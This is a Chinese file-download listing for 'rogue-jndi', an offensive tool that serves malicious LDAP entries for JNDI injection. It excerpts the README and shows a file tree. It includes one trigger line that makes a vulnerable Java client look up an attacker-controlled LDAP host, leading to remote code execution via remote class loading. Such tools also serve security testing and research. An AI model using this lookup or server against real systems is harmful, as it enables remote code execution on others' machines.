【文件属性】:
文件名称:rogue-jndi:用于JNDI注入攻击的恶意LDAP服务器
文件大小:20KB
文件格式:ZIP
更新时间:2021-05-04 20:47:06
Java
流氓JNDI
用于JNDI注入攻击的恶意LDAP服务器。
描述
该项目包含LDAP和HTTP服务器,用于利用默认情况下不安全的Java JNDI API。 为了执行攻击,您可以在本地启动这些服务器,然后在易受攻击的客户端上触发JNDI解析,例如:
InitialContext . doLookup( " ldap://your_server.com:1389/o=reference " );
它将启动从易受攻击的客户端到本地LDAP服务器的连接。 然后,本地服务器使用包含有效载荷之一的恶意条目进行响应,这对于实现远程代码执行很有用。
动机
除了已知的JNDI攻击方法(通过引用中的远程类加载)之外,此工具还利用的功能带来了新的攻击媒介。
支持的有效载荷
经典的JNDI攻击,通过远程类加载导致RCE,可达到jdk8u191
通过org.apache.naming.factory.Bea
【文件预览】:
rogue-jndi-master
----.gitignore(120B)
----src()
--------main()
--------test()
----LICENSE(1KB)
----pom.xml(3KB)
----README.md(5KB)